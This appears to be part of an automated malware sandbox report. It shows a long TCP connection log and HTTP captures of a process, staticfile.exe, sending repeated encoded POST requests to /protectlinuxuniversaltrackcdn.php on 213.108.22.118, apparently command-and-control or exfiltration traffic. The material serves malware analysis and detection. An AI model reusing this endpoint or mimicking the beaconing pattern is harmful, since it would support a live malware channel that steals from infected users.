                                        Nov 30, 2024 22:39:16.462869883 CET8050147213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:16.560913086 CET5014780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.591882944 CET5014680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.591943979 CET5014780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.592617989 CET5014880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.712126970 CET8050146213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:16.712521076 CET8050148213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:16.712749958 CET8050147213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:16.712902069 CET5014780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.712908983 CET5014680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.713037968 CET5014880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.716767073 CET5014880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:16.836674929 CET8050148213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:17.061021090 CET5014880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:17.181243896 CET8050148213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:17.181282043 CET8050148213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:17.181293011 CET8050148213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:17.997257948 CET8050148213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:18.076558113 CET5014880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:18.240673065 CET8050148213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:18.361125946 CET5014980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:18.389059067 CET5014880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:18.481368065 CET8050149213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:18.481453896 CET5014980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:18.481699944 CET5014980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:18.603749990 CET8050149213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:18.829046011 CET5014980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:18.949404001 CET8050149213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:18.949419975 CET8050149213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:18.949541092 CET8050149213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:19.796019077 CET8050149213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:19.929748058 CET5014980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:20.040512085 CET8050149213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:20.174108982 CET5014980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:20.174560070 CET5015080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:20.294552088 CET8050149213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:20.294574976 CET8050150213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:20.294621944 CET5014980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:20.294686079 CET5015080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:20.294828892 CET5015080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:20.414890051 CET8050150213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:20.639252901 CET5015080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:20.759408951 CET8050150213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:20.759428024 CET8050150213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:20.759440899 CET8050150213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:21.296098948 CET5015080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:21.296307087 CET5015180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:21.416233063 CET8050151213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:21.416273117 CET8050150213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:21.416342020 CET5015180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:21.416405916 CET5015080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:21.416575909 CET5015180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:21.421108007 CET5015280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:21.536470890 CET8050151213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:21.541193008 CET8050152213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:21.541328907 CET5015280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:21.541558981 CET5015280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:21.661509037 CET8050152213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:21.767708063 CET5015180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:21.887722969 CET8050151213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:21.887733936 CET8050151213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:21.927586079 CET5015280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:22.047657967 CET8050152213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:22.047667980 CET8050152213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:22.047679901 CET8050152213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:22.667907000 CET8050151213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:22.781055927 CET5015180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:22.798954010 CET8050152213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:22.857809067 CET5015280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:22.912348032 CET8050151213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:23.004272938 CET8050148213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:23.005196095 CET5014880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.040797949 CET8050152213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:23.092231989 CET5015180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.154820919 CET5015280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.168487072 CET5015180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.168822050 CET5015280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.168853045 CET5015380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.379791975 CET8050151213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:23.379802942 CET8050153213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:23.379808903 CET8050152213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:23.379899979 CET5015180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.379914045 CET5015380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.379961967 CET5015280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.380140066 CET5015380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.500196934 CET8050153213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:23.732897043 CET5015380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:23.853055954 CET8050153213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:23.853065968 CET8050153213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:23.853199005 CET8050153213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:24.731673002 CET8050153213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:24.889112949 CET5015380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:24.967475891 CET8050153213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:25.185969114 CET5015380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:25.286489964 CET5014880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:25.292381048 CET5015480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:25.412442923 CET8050154213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:25.412559986 CET5015480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:25.412697077 CET5015480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:25.532747984 CET8050154213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:25.764189959 CET5015480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:25.884712934 CET8050154213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:25.884721994 CET8050154213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:25.884839058 CET8050154213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:26.739872932 CET8050154213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:26.889588118 CET5015480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:26.984463930 CET8050154213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:27.092329979 CET5015480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:27.104438066 CET5015480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:27.105099916 CET5015580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:27.224837065 CET8050154213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:27.225023031 CET5015480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:27.225143909 CET8050155213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:27.225366116 CET5015580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:27.225506067 CET5015580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:27.345417976 CET8050155213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:27.576683998 CET5015580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:27.696825027 CET8050155213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:27.696831942 CET8050155213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:27.696851969 CET8050155213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:27.921200991 CET5015580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:27.921255112 CET5015680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:28.041270971 CET8050156213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.041352987 CET5015680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:28.041569948 CET5015680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:28.046506882 CET5015780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:28.083293915 CET8050155213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.161520004 CET8050156213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.166486025 CET8050157213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.166568041 CET5015780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:28.166754007 CET5015780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:28.214257002 CET8050155213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.214337111 CET5015580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:28.286648989 CET8050157213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.389194012 CET5015680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:28.509253979 CET8050156213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.509270906 CET8050156213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.514224052 CET5015780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:28.634246111 CET8050157213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.634270906 CET8050157213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:28.634310961 CET8050157213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:29.326303005 CET8050156213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:29.389594078 CET5015680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.417393923 CET8050157213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:29.558949947 CET8050156213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:29.561446905 CET5015780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.607898951 CET5015680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.660692930 CET8050157213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:29.722227097 CET8050153213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:29.725280046 CET5015380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.764121056 CET5015780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.785238981 CET5015680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.785352945 CET5015780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.785943031 CET5015880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.905730963 CET8050156213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:29.905834913 CET5015680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.905854940 CET8050158213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:29.905955076 CET5015880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.906125069 CET8050157213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:29.906173944 CET5015780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:29.906275988 CET5015880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:30.026654959 CET8050158213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:30.264384985 CET5015880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:30.384447098 CET8050158213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:30.384464025 CET8050158213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:30.384475946 CET8050158213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:31.215856075 CET8050158213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:31.264131069 CET5015880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:31.469825029 CET8050158213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:31.561008930 CET5015880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:31.586479902 CET5015380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:31.590368986 CET5015880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:31.590370893 CET5015980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:31.710374117 CET8050159213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:31.710484028 CET5015980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:31.710733891 CET8050158213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:31.710829020 CET5015880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:31.711740971 CET5015980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:31.831614971 CET8050159213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:32.068386078 CET5015980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:32.188824892 CET8050159213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:32.188836098 CET8050159213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:32.188846111 CET8050159213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:33.010008097 CET8050159213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:33.060997009 CET5015980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:33.265657902 CET8050159213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:33.357877970 CET5015980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:33.385941982 CET5015980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:33.386303902 CET5016080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:33.506339073 CET8050159213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:33.506356955 CET8050160213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:33.507167101 CET5015980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:33.507240057 CET5016080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:33.507489920 CET5016080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:33.628231049 CET8050160213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:33.858030081 CET5016080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:33.979971886 CET8050160213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:33.979989052 CET8050160213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:33.980174065 CET8050160213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:34.577548981 CET5016180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:34.578064919 CET5016080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:34.698167086 CET8050161213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:34.698263884 CET5016180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:34.698457003 CET5016180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:34.698888063 CET8050160213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:34.698954105 CET5016080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:34.713701010 CET5016280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:34.819725990 CET8050161213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:34.834738970 CET8050162213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:34.835449934 CET5016280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:34.839318991 CET5016280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:34.960207939 CET8050162213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:35.046217918 CET5016180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:35.166260958 CET8050161213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:35.166311026 CET8050161213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:35.953027010 CET8050161213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:36.061032057 CET5016180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:36.089139938 CET8050162213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:36.139154911 CET5016280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:36.200465918 CET8050161213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:36.248586893 CET5016180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:37.335907936 CET5016280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:37.455931902 CET8050162213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:37.455972910 CET8050162213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:37.455984116 CET8050162213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:37.722965956 CET8050162213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:37.764158010 CET5016280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:41.025856972 CET8050161213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:41.030008078 CET5016180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:39:42.726687908 CET8050162213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:39:42.726758957 CET5016280192.168.2.4213.108.22.118

                                        HTTP Request Dependency Graph

                                        • 213.108.22.118

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449731213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:43.765502930 CET326OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 332
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:35:44.142797947 CET332OUTData Raw: 00 00 04 03 06 0b 01 0a 05 06 02 01 02 05 01 03 00 01 05 08 02 07 03 08 02 56 0a 01 06 03 06 05 0d 56 06 0a 00 50 06 52 0e 00 07 54 05 51 07 04 05 05 0f 0d 0e 05 06 00 05 04 06 0d 04 07 07 0f 02 01 0a 08 04 04 07 03 0b 02 0e 03 0d 00 0b 00 06 01
                                        Data Ascii: VVPRTQXRTQP\L~A|^i]w\b_uKQPR[tUlksk_l|t^l`~h~cS``AiO~V@Ax}zAy\_
                                        Nov 30, 2024 22:35:45.093976974 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:35:45.575629950 CET1236INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:35:44 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 1380
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 56 4a 7d 5c 6c 6d 7f 07 79 61 74 48 7f 58 74 58 7d 67 7c 54 7f 73 69 42 79 73 55 5e 6a 61 7f 5b 74 70 65 4f 6d 62 69 01 77 76 68 03 6a 5b 78 01 55 4b 71 0c 60 4c 7c 5e 7f 4c 65 42 7c 77 58 41 7b 65 6c 09 7d 5d 63 03 61 62 7a 5e 74 4f 69 00 7f 72 7a 03 6a 6c 5e 0d 7d 49 64 5f 77 76 7b 06 7c 5b 75 01 7c 60 69 4b 6f 5e 6c 01 6f 49 78 4d 6f 53 68 5c 6e 5c 6c 01 7b 5d 50 04 7f 4e 55 58 78 64 6c 44 7e 04 70 5a 75 71 7c 49 7a 51 41 5b 7d 67 68 0a 7f 07 71 40 62 7c 7c 4e 6f 52 60 00 76 70 5c 09 7b 71 6d 4a 69 7f 76 41 6f 71 54 04 62 63 6f 00 75 62 64 06 76 61 50 50 7e 5d 7a 06 77 5b 7d 04 76 65 55 50 7e 7f 76 5d 77 6f 77 5d 7f 4d 6f 5a 78 6f 6f 03 6c 4e 66 01 7c 6d 7f 51 77 77 6c 02 7e 62 71 50 7e 6e 6f 0d 6f 7d 6d 5c 69 4c 5b 40 7b 5d 46 51 6b 6c 63 51 69 4e 5d 53 7d 01 6e 06 7b 6d 63 4a 6c 72 6b 58 6b 71 7c 5f 7e 74 7c 54 7f 4e 76 51 6e 5a 7c 00 7e 4c 60 01 60 4d 75 51 7b 5c 79 49 76 66 7c 06 7e 66 7c 4f 7e 58 79 0a 74 4c 55 4a 7c 5c 53 4d 7d 77 58 40 7b 58 7c 09 7e 73 63 49 76 4c 5b 04 77 4f 71 4a 7f 5f [TRUNCATED]
                                        Data Ascii: VJ}\lmyatHXtX}g|TsiBysU^ja[tpeOmbiwvhj[xUKq`L|^LeB|wXA{el}]cabz^tOirzjl^}Id_wv{|[u|`iKo^loIxMoSh\n\l{]PNUXxdlD~pZuq|IzQA[}ghq@b||NoR`vp\{qmJivAoqTbcoubdvaPP~]zw[}veUP~v]wow]MoZxoolNf|mQwwl~bqP~noo}m\iL[@{]FQklcQiN]S}n{mcJlrkXkq|_~t|TNvQnZ|~L``MuQ{\yIvf|~f|O~XytLUJ|\SM}wX@{X|~scIvL[wOqJ_~}RtAwQuas{\q~`}{w|ywRLymQzbVxc~O}`t{IlJ|bov_V}|wHwt@}aavlhO{|VtNfzqu}l~L{_zwscuqdta~^XwL[vK`laLw|`L~s^x|wxNzIC|Atw|}rf|mUz}f~LqNp`Olt}pZ|gb{}YDxLZ_Y}gcA|NSBz]t}L^IwMayqiuvZ~HZ~X}Ow\{J|LWL}gzxH|}skvLmwOyaz~R`C}gsKvagGzr[~puyg|MxwtO{}wIybtzszO{]NZodlJ|bpZwaljlshgSqvQuho|xK`^rzb}HiUb_z\y\}b`g{ZL~Jx^P`[mLu[t~l~^tR|hc_xBQK{Y~K|CsTvww^j[bOzSYQm_T~rzScWp]IRYcNWyaoa|RqgERrJjk|x]GQzs`L}L`tsXSn_jYu_c^}HR@}fyvakI|\y}teUlv^Q|YAYbn@Zr@k_DhUSkd_[cYz_q^izY|M{JL{SUX{u_o`AP|o]WdUjZ]f|zS^VJsbP~KqQN_ogGZsOnXEkyZo_GZ^q^Z]LucSyEp_O\boNRHcU@is_lZDW_}Eh~lPvZsyge~KzTRTWu
                                        Nov 30, 2024 22:35:45.575663090 CET373INData Raw: 45 54 61 54 47 50 58 08 41 68 6f 5d 49 52 06 04 77 6a 64 06 58 7c 53 5d 5a 62 5b 67 02 78 73 5e 45 50 5e 45 51 7d 77 7a 56 6e 60 00 42 52 7e 63 5f 58 60 05 5e 6d 07 09 02 5a 5c 63 4b 56 67 7f 41 6a 75 6d 51 76 5f 78 65 67 4f 79 46 7b 5e 57 55 54
                                        Data Ascii: ETaTGPXAho]IRwjdX|S]Zb[gxs^EP^EQ}wzVn`BR~c_X`^mZ\cKVgAjumQv_xegOyF{^WUT{KW`V@ZZ\[nEU}ydUsMj`{qYdETnj\iwzgRtlkt\zzx_maFWaXScUoFWqZBbbbYh`x{^{qQN_ogGZsOnXEk}@W[aAZZ`F\p^[bbP~]yx[rYr{zSofLXow]x^NZl`DVsKhULa
                                        Nov 30, 2024 22:35:45.661174059 CET302OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 384
                                        Expect: 100-continue
                                        Nov 30, 2024 22:35:46.012826920 CET384OUTData Raw: 50 5c 59 5d 50 5d 50 5a 55 5c 57 59 50 52 5a 53 58 5b 5b 53 51 5c 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\Y]P]PZU\WYPRZSX[[SQ\S^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!?=9# _1.'/Z?1;4R'.;*3\7<-3423.$._/%^/
                                        Nov 30, 2024 22:35:46.093929052 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:35:46.451206923 CET324INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:35:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 01 3c 3b 2d 03 28 01 29 1e 2e 59 3b 08 25 16 25 5a 3b 13 03 16 28 14 3d 5a 2a 3c 39 1d 21 06 05 5d 2b 29 00 1d 27 18 2d 01 3f 2b 2b 5e 0c 1b 20 07 2b 05 22 06 24 15 28 58 33 0e 24 59 22 0f 3f 12 30 3d 0c 11 2b 01 2a 17 34 1f 22 51 3b 1c 0b 57 25 5f 33 01 2a 01 02 0c 35 13 2f 56 0b 12 22 52 24 22 0b 13 26 11 24 58 34 30 00 5f 21 18 03 02 37 59 3d 1d 21 38 0c 1f 3c 00 00 5a 20 33 3f 0a 29 2e 39 13 24 32 23 50 3d 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: <;-().Y;%%Z;(=Z*<9!]+)'-?++^ +"$(X3$Y"?0=+*4"Q;W%_3*5/V"R$"&$X40_!7Y=!8<Z 3?).9$2#P=/P/"V1]M
                                        Nov 30, 2024 22:35:46.476763010 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1404
                                        Expect: 100-continue
                                        Nov 30, 2024 22:35:46.825823069 CET1404OUTData Raw: 50 5e 59 5c 55 55 50 59 55 5c 57 59 50 5b 5a 54 58 5d 5b 5a 51 5a 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^Y\UUPYU\WYP[ZTX][ZQZS_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!+271$^%X<Z-<323%.+>?]#,=S3 $#94._/%^/$
